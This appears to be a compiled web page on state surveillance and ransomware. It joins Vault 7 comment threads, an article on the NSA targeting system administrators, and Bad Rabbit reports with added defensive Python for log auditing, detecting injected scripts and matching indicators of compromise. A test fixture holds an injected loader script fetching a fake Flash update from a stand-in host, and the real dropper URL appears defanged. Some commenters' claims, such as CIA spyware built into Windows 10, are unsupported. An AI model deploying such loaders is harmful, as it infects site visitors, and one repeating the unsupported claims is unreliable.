Trump may not be the one for the task but we the people desperately need people 'unfit', for it is the many fit who brought us to this point. His unfit nature is as refreshing on these matters in its chaotic honest disbelief as Snowden and Wiki revelations. Refreshing because it's all we've got. One doesn't have to like Trump to still see missed opportunity so many should be telling him he could be the greatest pres ever if (for two examples) he fought tirelessly for single payer and to bring down this police state rather than the EPA or public education.

This cannot stand on so many levels. Not only is the fourth amendment rendered utterly void, but even if it weren't it falls far short of the protections we deserve.

No enemy could possibly be as bad as who we are and what we allow/do among ourselves. If an election can be hacked (not saying it was by Russia).. as these and other files prove anything can and will be hacked then our system is to blame, not someone else.

What amazes me is that the spooks haven't manufactured proof needed to take Trump out of office Bonfire of The Vanities style. I'd like to think the people have moved beyond the point they would believe manufactured evidence but the Russia thing proves otherwise.

These people foment world war while probing our every move and we do nothing!

If we wait for someone fit nothing will ever change because we wait for the police/media/oligarch state to tell us who is fit.

Anon , March 9, 2017 at 2:40 pm

being "unfit" does not automatically make someone a savior.

Stephen Gardner , March 9, 2017 at 3:05 pm

But being fit by the standards of our ruling class, the "real owners" as Carlin called them is, in my book, an automatic proof that they are up to no good. Trump is not my cup of tea as a president but no one we have had in a while wasn't clearly compromised by those who fund them. Did you ever wonder why we have never had a president or even a powerful member of congress that was not totally in the tank for that little country on the Eastern Mediterranean? Or the Gulf Monarchies? Do you think that is by accident? Do you think money isn't involved? Talk about hacked elections! We should be so lucky as to have ONLY Russians attempting to affect our elections. Money is what hacks US elections and never forget that. To me it is laughable to discuss hacking the elections without discussing the real way our "democracy" is subverted–money not document leaks or voting machine hacks. It's money.

Why isn't Saudi Arabia on Trump's list? Iran that has never been involved in a terrorist act on US soil is but not Saudi Arabia? How many 911 hijackers came from Iran? If anything saves Trump from destruction by the real owners of our democracy it is his devotion to the aforementioned countries.

Allegorio , March 9, 2017 at 4:00 pm

The point again is not to remove him from office but to control him. With Trump's past you better believe the surveillance state has more than enough to remove him from office. Notice the change in his rhetoric since inauguration? More and more he is toeing the establishment Republican line. Of course this depends on whether you believe Trump is a break with the past or just the best liar out there. A very unpopular establishment would be clever in promoting their agent by pretending to be against him.

Anyone who still believes that the US is a democratic republic and not a mafia state needs to stick their heads deeper into the sands. When will the low information voters and police forces on whom a real revolution depends realize this is anyone's guess. The day is getting closer especially for the younger generation. The meme among the masses is that government has always been corrupt and that this is nothing new. I do believe the level of immorality among the credentialed classes is indeed very new and has become the new normal. Generations of every man for himself capitalist philosophy undermining any sense of morality or community has finally done its work.

HBE , March 9, 2017 at 8:47 am

Go take a jaunt over to huffpo, at the time of this post there was not a single mention of vault 7 on the front page. Just a long series of anti trump administration articles.

Glad to know for sure who the true warmongers were all along.

Arizona Slim , March 9, 2017 at 8:50 am

We need another Church Commission.

Eureka Springs , March 9, 2017 at 8:59 am

No.. The Church commission was a sweep it under the rug operation. It got us FISA courts. More carte blanche secrecy, not less. Neither the commission nor the rest of the system even held violators of the time accountable.

We have files like Vault 7. Commissions rarely get in secret what we have right here before our eyes.

Arizona Slim , March 9, 2017 at 1:31 pm

Well, how about a Truth and Reconciliation Commission?

Foppe , March 9, 2017 at 1:55 pm

Cute but the ANC lost the war by acceding to WTO entry (which "forbade" distributive politics, land/resource redistribution, nationalizations, etc.).

River , March 9, 2017 at 10:59 am

Need Langley surrounded and fired upon by tanks at this point.

Err on the side of caution.

DJG , March 9, 2017 at 12:49 pm

River: Interesting historic parallel? I believe that the Ottomans got rid of the Janissaries that way, after the Janissaries had become a state within a state, by using cannons on their HQ

From Wiki entry, Janissaries:

The corps was abolished by Sultan Mahmud II in 1826 in the Auspicious Incident in which 6,000 or more were executed.

polecat , March 9, 2017 at 12:53 pm

"Nuke it from orbit. It's the only way to be sure."

knowbuddhau , March 9, 2017 at 9:01 am

Took less than a minute to download the 513.33MB file. The passphrase is what JFK said he'd like to do to CIA: SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds.

"The illegal we do immediately; the unconstitutional takes a little longer." Henry Kissinger, 1975.

Stormcrow , March 9, 2017 at 9:35 am

Here is Raimondo's take:
Spygate
http://original.antiwar.com/justin/2017/03/07/spygate-americas-political-police-vs-donald-j-trump/

The campaign to frame up and discredit Trump and his associates is characteristic of how a police state routinely operates. A national security apparatus that vacuums up all our communications and stores them for later retrieval has been utilized by political operatives to go after their enemies – and not even the President of the United States is immune. This is something that one might expect to occur in, say, Turkey, or China: that it is happening here, to the cheers of much of the media and the Democratic party, is beyond frightening.

The irony is that the existence of this dangerous apparatus – which civil libertarians have warned could and probably would be used for political purposes – has been hailed by Trump and his team as a necessary and proper function of government. Indeed, Trump has called for the execution of the person who revealed the existence of this sinister engine of oppression – Edward Snowden. Absent Snowden's revelations, we would still be in the dark as to the existence and vast scope of the NSA's surveillance.

And now the monster Trump embraced in the name of "national security" has come back to bite him.

We hear all the time that what's needed is an open and impartial "investigation" of Trump's alleged "ties" to Russia. This is dangerous nonsense: does every wild-eyed accusation from embittered losers deserve a congressional committee armed with subpoena power bent on conducting an inquisition? Certainly not.

What must be investigated is the incubation of a clandestine political police force inside the national security apparatus, one that has been unleashed against Trump – and could be deployed against anyone.

This isn't about Donald Trump. It's about preserving what's left of our old republic.

Perhaps overstated but well worth pondering.

SplinterItIntoAThousandPiecesAndScatterItIntoTheWinds. , March 9, 2017 at 10:06 am

Yeah I downloaded it the day it came out and spent an hour or so looking at it last night. First impressions – "heyyy this is like a Hackers Guide – the sort I used in the 80s, or DerEngel's Cable Modem Hacking" of the 00s.

2nd impressions – wow it really gives foundational stuff – like "Enable Debug on PolarSSL".

3rd impressions – "I could spend hours going thru this happily ".

4th impressions – I went looking for the "juicy bits" of interest to me – SOHO routers, small routers – sadly it's just a table documenting routers sold around the world, and whether these guys have put the firmware in their Stash Repository. Original firmware, not hacked one. But the repository isn't in the vault dump, AFAIK.

It's quite fascinating. But trying to find the "juicy stuff" is going to be tedious. One can spend hours and hours going thru it. To speed up going thru it, I'm going to need some tech sites to say "where to go".

flora , March 9, 2017 at 11:21 am

It seems clear that Wikileaks has not and will not release actual ongoing method "how-to" info or hacking scripts. They are releasing the "whats", not the tech level detailed "hows". This seems like a sane approach to releasing the data. The release appears to be for political discussion, not for spreading the hacking tools. So I wouldn't look for "juicy bits" about detailed methodology. Just my guess.

That said, love what you're doing digging into this stuff. I look forward to a more detailed report in future. Thanks.

Sam F , March 9, 2017 at 10:10 am

Yves, I think that you much underestimate the extremity of these exposed violations of the security of freedom of expression, and of the security of private records. The WikiLeaks docs show that CIA has developed means to use all personal digital device microphones and cameras even when they are "off," and to send all of your files and personal data to themselves, and to send your private messages to themselves before they are encrypted. They have installed this spyware in the released version of Windows 10, and can easily install it on all common systems and devices.

This goes far beyond the kind of snooping that required specialized devices installed near the target, which could be controlled by warrant process. There is no control over this extreme spying. It is totalitarianism now.

This is probably the most extreme violation of the rights of citizens by a government in all of history. It is far worse than the "turnkey tyranny" against which Snowden warned, on the interception of private messages. It is tyranny itself, the death of democracy.

Outis Philalithopoulos , March 9, 2017 at 10:58 am

Your first sentence is a bit difficult to understand. If you read Yves' remarks introducing the post, she says that the revelations are "a big deal" "if the Wikileaks claim is even halfway true," while coming down hard on the MSM and others for "pooh-pooh[ing]" the story. Did you want her to add more exclamation points?

susan the other , March 9, 2017 at 10:59 am

So we have a zillion ways to spy and hack and deceive and assassinate, but no control. I think this is what the military refers to as "being overtaken by events."

It's easy to gather information; not so easy to analyze it, and somehow impossible to act on it in good faith. With all this ability to know stuff and surveil people the big question is, Why does everything seem so beyond our ability to control it?

We should know well in advance that banks will fail catastrophically; that we will indeed have sea level rise; that resources will run out; that water will be undrinkable; that people will be impossible to manipulate when panic hits – but what do we do? We play dirty tricks, spy on each other like voyeurs, and ignore the inevitable. Like the Stasi, we clearly know what happened, what is happening and what is going to happen. But we have no control.

NotTimothyGeithner , March 9, 2017 at 11:34 am

My godfather was in the CIA in the late sixties and early seventies, and he said that outside of the President's pet projects there was no way to sift through and bring important information to decision makers before it made the Washington Post (he is aware of the irony) and hit the President's breakfast table.

Arizona Slim , March 9, 2017 at 1:33 pm

Do you mean to say that the CIA leaked like a sieve? That's my understanding of your post.

Old Jake , March 9, 2017 at 6:05 pm

AS, I would interpret it as saying that there was so much coming in it was like trying to classify snowflakes in a snowstorm. They could pick a few subject areas to look at closely but the rest just went into the files.

Leaking like a sieve is also likely, but perhaps not the main point.

Andrew , March 9, 2017 at 11:14 am

The archive appears to have been circulated among government hackers and contractors in an authorized manner

There, that looks the more likely framing considering CIA & DNI on behalf of the whole US IC seemingly fostered wide dissemination of these tools, information. Demonstration of media control an added plus.

Cheers Yves

Stormcrow , March 9, 2017 at 11:20 am

The Empire Strikes Back

WikiLeaks Has Joined the Trump Administration
Max Boot
Foreign Policy magazine

https://foreignpolicy.com/2017/03/08/wikileaks-has-joined-the-trump-administration/?utm_source=Sailthru&utm_medium=email&utm_campaign=New+Campaign&utm_term=%2AEditors+Picks

I guess we can only expect more of this.

Todd Pierce, on the other hand, nails it. (From his Facebook page.)
The East German Stasi could only dream of the sort of surveillance the NSA and CIA do now, with just as nefarious of purposes.

lyman alpha blob , March 9, 2017 at 11:42 am

Perhaps the scare quotes around "international mobster" aren't really necessary.

In all this talk about the various factions aligned with and against Trump, that's one I haven't heard brought up by anybody. With all the cement poured in Trump's name over the years, it would be naive to think his businesses had not brushed up against organized crime at some point. Question is, whose side are they on?

JTMcPhee , March 9, 2017 at 3:02 pm

Like all the other players, the "side" they are on is them-effing-selves. And isn't that the whole problem with our misbegotten species, writ large?

Then there's this: https://www.youtube.com/watch?v=s1Hzds9aGdA Maybe these people will be around and still eating after us urban insects and rodents are long gone? Or will our rulers decide no one should survive if they don't?

Skip Intro , March 9, 2017 at 12:55 pm

To what extent do these hacks represent the CIA operating within the US? To what extent is that illegal? With the democrats worshipping the IC, will anyone in an official position dare to speak out?

tegnost , March 9, 2017 at 1:05 pm

Well we know chuckie won't speak out..

http://thehill.com/homenews/administration/312605-schumer-trump-being-really-dumb-by-going-after-intelligence-community

FTA "Schumer said that as he understands, intelligence officials are "very upset with how [Trump] has treated them and talked about them.""

Oregoncharles , March 9, 2017 at 2:17 pm

I've long thought that the reason Snowden was pursued so passionately was that he exposed the biggest, most embarrassing secret: that the National "Security" Agency's INTERNAL security was crap.

And here it is: "Wikileaks claims that the CIA lost control of the majority of its hacking arsenal "

The CIA's internal security is crap, too. Really a lot of people should be fired over that, as well as over Snowden's release. We didn't hear of it happening in the NSA, though I'm not sure we would have. Given Gaius's description of Trump's situation, it seems unlikely it will happen this time, either. One of my hopes for a Trump administration, as long as we're stuck with it, was a thorough cleanout of the upper echelons in the IC. It's obviously long overdue, and Obama wasn't up to it. But I used the past tense because I don't think it's going to happen. Trump seems more interested in sucking up to them, presumably so they won't kill him or his family. That being one of their options.

Stephen Gardner , March 9, 2017 at 3:51 pm

Ah, that's the beauty of contracting it out. No one gets fired. Did anyone get fired because of Snowden? It was officially a contractor problem and since there are only a small number of contractors capable of doing the work, well you know. We can't get new ones.

tiebie66 , March 9, 2017 at 2:59 pm

What I find by far the most distressing is this: "The CIA had created, in effect, its "own NSA" with even less accountability ." [My emphasis]. It seems to characterize an organization that operates outside of any control and oversight – and one that is intentionally structuring itself that way. That worries me.

It is becoming increasingly clear that the Republic is lost because we didn't stand guard for it. Blaming others doesn't cut it either – we let it happen. And like the Germans about the Nazi atrocities, we will say that we didn't know about it.

JTMcPhee , March 9, 2017 at 3:06 pm

Hey, I didn't let it happen. Stuff that spooks and sh!tes do behind the Lycra ™ curtain happens because it is, what is the big word again, "ineluctable." Is my neighbor to blame for having his house half eaten by both kinds of termites, where the construction is such that the infestation and damage are invisible until the vast damage is done?

Stephen Gardner , March 9, 2017 at 4:08 pm

And just how were we supposed to stand guard against a secret and unaccountable organization that protected itself with a shield of lies? And every time some poor misfit complained about it they were told that they just didn't know the facts. If they only knew what our IC knows they would not complain.

It's a dangerous world out there and only our brave IC can protect us from it. Come on. Stop blaming the victim and place the blame where it belongs–our IC and MIC. I say stop feeding the beast with your loyalty to a government that has ceased to be yours.

Studiously avoid any military celebrations. Worship of the military is part of the problem. Remember, the people you thank for "their service" are as much victims as you are. Sadly they don't realize that their service is to a rotten empire that is not worthy of their sacrifice but every time we perform the obligatory ritual of thankfulness we participate in the lie that the service is to a democratic country instead of an undemocratic empire.

It's clearly a case of Wilfred Owen's classic "Dulce et Decorum Est". Read the poem, google it and read it. It is instructive: " you would not tell with such high zest To children ardent for some desperate glory, The old Lie: Dulce et decorum est Pro patria mori." Make no mistake. It is a lie and it can only be undone if we all cease to tell it.

nonsense factory , March 9, 2017 at 8:57 pm

Here's a pretty decent review of the various CIA programs revealed by Wikileaks:

http://www.libertyforjoe.com/2017/03/what-is-vault-7.html

"These CIA revelations in conjunction with those of the NSA paints a pretty dark future for privacy and freedom. Edward Snowden made us aware of the NSA's program XKEYSCORE and PRISM which are utilized to monitor and bulk collect information from virtually any electronic device on the planet and put it into a searchable database. Now Wikileaks has published what appears to be additional Big Brother techniques used by a competing agency. Say what you want about the method of discovery, but Pandora's box has been opened."

[Dec 11, 2017] Built-in keyboard loggers in modern hardware and smartphones

Dec 11, 2017 | www.unz.com

cowardly troll , December 11, 2017 at 9:16 pm GMT

@cowardly troll

Concerning point 2

https://www.rt.com/news/412778-hp-laptop-keylogger-code/

A security researcher has revealed that some HP laptops have hidden software which can log everything typed on its keypads. More than 460 models have been affected, dating back to 2012, according to the list released by HP.

And what about Android and iOS predictive "keyboards"

https://www.rt.com/news/412060-virtual-keyboard-users-exposed/

More than 31 million users of a popular virtual keyboard app AI.type, have had their private data exposed online, including email addresses, passwords, dates of birth and details from Google accounts, as well as actual text entered using the keyboard.

https://sputniknews.com/news/201605121039470344-google-apple-keyboard-app-spying/

On Android phones and iPhones you can swap out the traditional keyboards with emoji and gif-laden alternatives, but pay attention when you install third party keyboards because apps require full access. By choosing that option, developers "transmit anything you type" back to their servers.

Hu Mi Yu , December 11, 2017 at 2:41 pm GMT
@cowardly troll

Example, in 1999 I read an article in a weekly tech newspaper – maybe Information Week – about university researchers who discovered that 64 bit encrypted phones were only using the first 56 bits and the last 8 were zeros.

If you read source code, you will find other cases of security being compromised by coding "errors". This is why we are being pushed into accepting proprietary code.

cowardly troll , December 11, 2017 at 8:32 pm GMT
@Hu Mi Yu

Two points:

(1) Orwell's memory hole is real, and if you have a memory of something, but no web page to back it up, you cannot convince someone.

(2) A former government contractor says that the U.S. Federal Bureau of Investigation installed a number of back doors into the encryption software used by the OpenBSD operating system.

https://arstechnica.com/information-technology/2010/12/fbi-accused-of-planting-backdoor-in-openbsd-ipsec-stack/

https://www.pcworld.com/article/213751/former_contractor_says_fbi_put_back_door_in_openbsd.html

No word from Wikileaks or the Linux community about CIA hack:

https://sputniknews.com/science/201703071051349744-cia-anti-viruses-wikileaks/

The US Central Intelligence Agency (CIA) found different ways to penetrate the defenses set up by various well-known anti-virus programs, the WikiLeaks whistleblowing website said Tuesday.

According to the document, the CIA also devised malware targeting Microsoft Windows, Mac OS, Linux and other operating systems.

_daniel_ , December 11, 2017 at 10:35 pm GMT
You may be remembering DES:

https://en.wikipedia.org/wiki/Data_Encryption_Standard

It was a standard for many years, and it had 56 bit keys.

[Dec 01, 2017] NSA hacks system administrators, new leak reveals

Highly recommended!
The "I hunt sys admins" approach is the most reasonable one if you want to get into a corporate network, so republishing this three-year-old post is just a reminder. Any sysadmin who accesses the corporate network from anything other than a dedicated, corporate-managed computer (a corporate laptop over VPN) is endangering the corporation. As simple as that. The level of non-professionalism demonstrated by Hillary Clinton's IT staff suggests that this can be a problem in government too. After all, the Snowden documents are now studied by all major intelligence agencies of the world.
This also outlines the main danger of "shadow IT".
Notable quotes:
"... Journalist Ryan Gallagher reported that Edward Snowden , a former sys admin for NSA contractor Booz Allen Hamilton, provided The Intercept with the internal documents, including one from 2012 that's bluntly titled "I hunt sys admins." ..."
"... "Who better to target than the person that already has the 'keys to the kingdom'?" ..."
"... "They were written by an NSA official involved in the agency's effort to break into foreign network routers, the devices that connect computer networks and transport data across the Internet," ..."
"... "By infiltrating the computers of system administrators who work for foreign phone and Internet companies, the NSA can gain access to the calls and emails that flow over their networks." ..."
"... The latest leak suggests that some NSA analysts took a much different approach when tasked with trying to collect signals intelligence that otherwise might not be easily available. According to the posts, the author advocated for a technique that involves identifying the IP address used by the network's sys admin, then scouring other NSA tools to see what online accounts used those addresses to log-in. Then by using a ..."
"... that tricks targets into installing malware by being misdirected to fake Facebook servers, the intelligence analyst can hope that the sys admin's computer is sufficiently compromised and exploited. ..."
"... Once the NSA has access to the same machine a sys admin does, American spies can mine for a trove of possibly invaluable information, including maps of entire networks, log-in credentials, lists of customers and other details about how systems are wired. In turn, the NSA has found yet another way to, in theory, watch over all traffic on a targeted network. ..."
"... "Up front, sys admins generally are not my end target. My end target is the extremist/terrorist or government official that happens to be using the network some admin takes care of," the NSA employee says in the documents. ..."
"... "A key part of the protections that apply to both US persons and citizens of other countries is the mandate that information be in support of a valid foreign intelligence requirement, and comply with US Attorney General-approved procedures to protect privacy rights." ..."
"... Coincidentally, outgoing-NSA Director Keith Alexander said last year that he was working on drastically cutting the number of sys admins at that agency by upwards of 90 percent - but didn't say it was because they could be exploited by similar tactics waged by adversarial intelligence groups. ..."
Mar 21, 2014 | news.slashdot.org

In its quest to take down suspected terrorists and criminals abroad, the United States National Security Agency has adopted the practice of hacking the system administrators that oversee private computer networks, new documents reveal.

The Intercept has published a handful of leaked screenshots taken from an internal NSA message board where one spy agency specialist spoke extensively about compromising not the computers of specific targets, but rather the machines of the system administrators who control entire networks.

Journalist Ryan Gallagher reported that Edward Snowden, a former sys admin for NSA contractor Booz Allen Hamilton, provided The Intercept with the internal documents, including one from 2012 that's bluntly titled "I hunt sys admins."

According to the posts - some labeled "top secret" - NSA staffers should not shy away from hacking sys admins: a successful offensive mission waged against an IT professional with extensive access to a privileged network could provide the NSA with unfettered capabilities, the analyst acknowledged.

"Who better to target than the person that already has the 'keys to the kingdom'?" one of the posts reads.

"They were written by an NSA official involved in the agency's effort to break into foreign network routers, the devices that connect computer networks and transport data across the Internet," Gallagher wrote for the article published late Thursday. "By infiltrating the computers of system administrators who work for foreign phone and Internet companies, the NSA can gain access to the calls and emails that flow over their networks."

Since last June, classified NSA materials taken by Snowden and provided to certain journalists have exposed an increasing number of previously-secret surveillance operations that range from purposely degrading international encryption standards and implanting malware in targeted machines, to tapping into fiber-optic cables that transfer internet traffic and even vacuuming up data as it's moved into servers in a decrypted state.

The latest leak suggests that some NSA analysts took a much different approach when tasked with trying to collect signals intelligence that otherwise might not be easily available. According to the posts, the author advocated for a technique that involves identifying the IP address used by the network's sys admin, then scouring other NSA tools to see what online accounts used those addresses to log-in. Then by using a previously-disclosed NSA tool that tricks targets into installing malware by being misdirected to fake Facebook servers, the intelligence analyst can hope that the sys admin's computer is sufficiently compromised and exploited.

Once the NSA has access to the same machine a sys admin does, American spies can mine for a trove of possibly invaluable information, including maps of entire networks, log-in credentials, lists of customers and other details about how systems are wired. In turn, the NSA has found yet another way to, in theory, watch over all traffic on a targeted network.

"Up front, sys admins generally are not my end target. My end target is the extremist/terrorist or government official that happens to be using the network some admin takes care of," the NSA employee says in the documents.

When reached for comment by The Intercept, NSA spokesperson Vanee Vines said that, "A key part of the protections that apply to both US persons and citizens of other countries is the mandate that information be in support of a valid foreign intelligence requirement, and comply with US Attorney General-approved procedures to protect privacy rights."

Coincidentally, outgoing-NSA Director Keith Alexander said last year that he was working on drastically cutting the number of sys admins at that agency by upwards of 90 percent - but didn't say it was because they could be exploited by similar tactics waged by adversarial intelligence groups. Gen. Alexander's decision came just weeks after Snowden - previously one of around 1,000 sys admins working on the NSA's networks, according to Reuters - walked away from his role managing those networks with a trove of classified information.
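The correlation the NSA post describes (find the address the admin works from, then see what else authenticates from it) is exactly what a defender can run against their own logs, in the other direction. The following Python is an added example written for this page, not code from the article, The Intercept or the leaked documents. It scans constructed sshd log lines for two things: privileged accounts logging in from outside a dedicated VPN pool (the exposure the note above warns about), and source addresses that would be an attacker's pivot candidates because an admin account and an unmanaged address meet there. The account names, the 10.8.0.0/24 VPN range and the log lines are hypothetical.

```python
import ipaddress
import re
from collections import defaultdict

# Constructed sshd log lines for the example; not from any real system.
SAMPLE_LOG = """\
Mar 21 09:01:12 bastion sshd[4120]: Accepted publickey for alice from 10.8.0.14 port 51022 ssh2
Mar 21 09:03:44 bastion sshd[4133]: Accepted password for bob from 203.0.113.77 port 40112 ssh2
Mar 21 09:05:01 bastion sshd[4140]: Accepted publickey for root from 198.51.100.23 port 55010 ssh2
Mar 21 09:07:30 bastion sshd[4152]: Accepted publickey for alice from 198.51.100.23 port 55012 ssh2
Mar 21 09:09:15 bastion sshd[4160]: Failed password for root from 192.0.2.9 port 33001 ssh2
Mar 21 09:11:02 bastion sshd[4171]: Accepted publickey for carol from 10.8.0.21 port 51100 ssh2
"""

# Hypothetical policy: these accounts are privileged, and admins may only
# arrive from the corporate VPN pool (i.e. from a managed corporate laptop).
ADMIN_ACCOUNTS = {"root", "alice"}
ALLOWED_ADMIN_NETS = [ipaddress.ip_network("10.8.0.0/24")]

ACCEPTED_RE = re.compile(
    r"sshd\[\d+\]: Accepted (?P<method>\w+) for (?P<user>\S+) from (?P<ip>\S+) port"
)


def parse_accepted(log_text):
    """Yield (user, source_ip, auth_method) for every successful sshd login."""
    for line in log_text.splitlines():
        m = ACCEPTED_RE.search(line)
        if m:
            yield m.group("user"), m.group("ip"), m.group("method")


def is_allowed_source(ip):
    """True if the address is inside one of the managed admin networks."""
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in ALLOWED_ADMIN_NETS)


def find_exposed_admin_logins(log_text):
    """Privileged accounts authenticating from outside the VPN pool, in log order."""
    return [(user, ip) for user, ip, _ in parse_accepted(log_text)
            if user in ADMIN_ACCOUNTS and not is_allowed_source(ip)]


def accounts_by_source(log_text):
    """The correlation from the NSA post: which accounts share a source IP."""
    seen = defaultdict(set)
    for user, ip, _ in parse_accepted(log_text):
        seen[ip].add(user)
    return dict(seen)


def pivot_candidates(log_text):
    """Source addresses an attacker would prize: an admin account logs in from
    them and they are not a managed corporate address, so they are most likely
    a personal machine that is easier to compromise than the bastion itself."""
    return sorted(ip for ip, users in accounts_by_source(log_text).items()
                  if users & ADMIN_ACCOUNTS and not is_allowed_source(ip))


if __name__ == "__main__":
    for user, ip in find_exposed_admin_logins(SAMPLE_LOG):
        print(f"ALERT: admin account {user} logged in from unmanaged address {ip}")
    print("pivot candidates:", pivot_candidates(SAMPLE_LOG))
```

On the sample, alice arrives once from the VPN pool and once from 198.51.100.23, the same address root uses; that address is the pivot candidate, and both of those logins are alerts. The failed root login from 192.0.2.9 is deliberately ignored here, since the point is where admins succeed from, not brute-force noise.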

[Nov 05, 2017] Bad Rabbit Ten things you need to know about the latest ransomware outbreak ZDNet

Nov 05, 2017 | www.zdnet.com
It spreads via a fake Flash update on compromised websites

The main way Bad Rabbit spreads is drive-by downloads on hacked websites. No exploits are used, rather visitors to compromised websites -- some of which have been compromised since June -- are told that they need to install a Flash update. Of course, this is no Flash update, but a dropper for the malicious install.

A compromised website asking a user to install a fake Flash update which distributes Bad Rabbit.

Image: ESET

Infected websites -- mostly based in Russia, Bulgaria, and Turkey -- are compromised by having JavaScript injected in their HTML body or in one of their .js files.
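A site owner can check for this kind of injection with a script that lists every <script> on a page and flags any that loads from, or references, a host outside the site's own origin. The following Python is an added example written for this page, not ESET's or ZDNet's code. The sample HTML, the hosts example-news.test and fake-flash-update.invalid, and the allowlist are constructed; a real sweep would fetch each page and each first-party .js file and run the same two functions over them.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

URL_RE = re.compile(r"https?://[^\s'\"<>]+")


class ScriptCollector(HTMLParser):
    """Collect every <script> element as ("src", url) or ("inline", code)."""

    def __init__(self):
        super().__init__()
        self.scripts = []
        self._in_script = False
        self._buf = []

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        src = dict(attrs).get("src")
        if src:
            self.scripts.append(("src", src))
        else:
            self._in_script = True
            self._buf = []

    def handle_data(self, data):
        if self._in_script:
            self._buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            self.scripts.append(("inline", "".join(self._buf)))


def foreign_host(url, page_host, allowed_hosts):
    """Return the host of `url` if it is neither the page's own host nor an
    allowed host (or a subdomain of one); None for first-party/relative URLs."""
    host = (urlparse(url).hostname or "").lower()
    if not host or host == page_host:
        return None
    if any(host == a or host.endswith("." + a) for a in allowed_hosts):
        return None
    return host


def find_injected_scripts(html, page_host, allowed_hosts=()):
    """Flag external scripts loaded from foreign hosts and inline scripts that
    embed a URL on a foreign host (the loader pattern behind a fake Flash prompt)."""
    collector = ScriptCollector()
    collector.feed(html)
    findings = []
    for kind, value in collector.scripts:
        if kind == "src":
            host = foreign_host(value, page_host, allowed_hosts)
            if host:
                findings.append(("external", host, value))
        else:
            for url in URL_RE.findall(value):
                host = foreign_host(url, page_host, allowed_hosts)
                if host:
                    findings.append(("inline", host, url))
    return findings


def find_foreign_urls_in_js(js_text, page_host, allowed_hosts=()):
    """Same check for a site's own .js files, the other place the loader was injected."""
    hits = []
    for url in URL_RE.findall(js_text):
        host = foreign_host(url, page_host, allowed_hosts)
        if host:
            hits.append((host, url))
    return hits


# Constructed sample page: a first-party script, a script from the site's own
# CDN subdomain, and an injected loader pulling a "Flash update" from a
# hypothetical third-party host (.invalid is reserved and never resolves).
SAMPLE_HTML = """<html><head>
<script src="/js/site.js"></script>
<script src="https://static.example-news.test/lib/jquery.js"></script>
</head><body>
<p>story text</p>
<script>var s=document.createElement('script');s.src='http://fake-flash-update.invalid/flash_install.php';document.body.appendChild(s);</script>
</body></html>"""

if __name__ == "__main__":
    for kind, host, url in find_injected_scripts(SAMPLE_HTML, "www.example-news.test", ("example-news.test",)):
        print(f"{kind} script references foreign host {host}: {url}")
```

The allowlist matters: without it every CDN subdomain shows up as a finding, so build it from the site's known third-party dependencies first and treat anything left over as suspect. Obfuscated loaders that assemble the URL from pieces will slip past the URL regex; for those, diff the page and .js files against a known-good copy from version control.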

[Nov 05, 2017] Bad Rabbit ransomware - Securelist

Nov 05, 2017 | securelist.com

What is Bad Rabbit?

Bad Rabbit is a previously unknown ransomware family.

How is Bad Rabbit distributed?

The ransomware dropper was distributed with the help of drive-by attacks. While the target is visiting a legitimate website, a malware dropper is being downloaded from the threat actor's infrastructure. No exploits were used, so the victim would have to manually execute the malware dropper, which pretends to be an Adobe Flash installer. However, our analysis confirmed that Bad Rabbit uses the EternalRomance exploit as an infection vector to spread within corporate networks. The same exploit was used in ExPetr.

We've detected a number of compromised websites, all of which were news or media websites.

Whom does it target?

Most of the targets are located in Russia. Similar but fewer attacks have also been seen in other countries – Ukraine, Turkey and Germany. Overall, there are almost 200 targets, according to the KSN statistics.

Since when does Kaspersky Lab detect the threat?

We have been proactively detecting the original vector attack since it began on the morning of October 24. The attack lasted until midday, although ongoing attacks were detected at 19.55 Moscow time. The server from which the Bad Rabbit dropper was distributed went down in the evening (Moscow time).

How is it different to ExPetr? Or is it the same malware?

Our observations suggest that this has been a targeted attack against corporate networks, using methods similar to those used during the ExPetr attack. What's more, the code analysis showed a notable similarity between the code of ExPetr and Bad Rabbit binaries.

Technical details

According to our telemetry, the ransomware is spread via a drive-by attack.

The ransomware dropper is distributed from hxxp://1dnscontrol[.]com/flash_install.php
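Securelist publishes the dropper URL defanged (hxxp, [.]) so it cannot be clicked by accident. To sweep a proxy log for it you have to refang the indicator and match on both the full URL and the bare host, because the path can change while the domain stays the same, and a client that fetched anything from that host talked to the attacker's infrastructure. The following Python is an added example for this page, not Kaspersky's tooling; the proxy-log format and lines are constructed, and the only indicator in the list is the one quoted above.

```python
import re
from urllib.parse import urlparse

# The only indicator here is the one published in the excerpt above, kept in
# its defanged form exactly as an analyst would paste it from the report.
IOCS = [
    "hxxp://1dnscontrol[.]com/flash_install.php",
]

# Constructed proxy log: "<epoch> <client_ip> <method> <url> <status>".
SAMPLE_PROXY_LOG = """\
1508836200 10.1.2.15 GET http://www.example-news.test/story.html 200
1508836203 10.1.2.15 GET http://1dnscontrol.com/flash_install.php 200
1508836204 10.1.2.15 GET http://1dnscontrol.com/index.php 404
1508836260 10.1.2.40 GET https://cdn.example-static.test/app.js 200
"""


def refang(indicator):
    """Turn a defanged indicator (hxxp, [.], (.), [:]) back into a real URL."""
    s = indicator.strip()
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")


def defang(url):
    """Inverse of refang, for writing indicators into a report: neuter the
    scheme and the dots of the host, leave the path alone."""
    parsed = urlparse(url)
    host = parsed.hostname or ""
    scheme = parsed.scheme.replace("http", "hxxp")
    rest = url.split(host, 1)[1] if host else url
    return f"{scheme}://{host.replace('.', '[.]')}{rest}"


def build_ioc_index(indicators):
    """Index refanged indicators by full URL and by bare host."""
    urls, hosts = set(), set()
    for ioc in indicators:
        url = refang(ioc)
        urls.add(url)
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return urls, hosts


def match_proxy_log(log_text, indicators):
    """Return (client_ip, url, match_type) for each log line hitting an IOC.
    A full-URL hit is the dropper download itself; a host-only hit still means
    the client contacted the attacker's server and deserves a look."""
    urls, hosts = build_ioc_index(indicators)
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        if len(fields) < 5:
            continue  # skip malformed lines rather than abort the sweep
        client, url = fields[1], fields[3]
        host = (urlparse(url).hostname or "").lower()
        if url in urls:
            hits.append((client, url, "url"))
        elif host in hosts:
            hits.append((client, url, "host"))
    return hits


if __name__ == "__main__":
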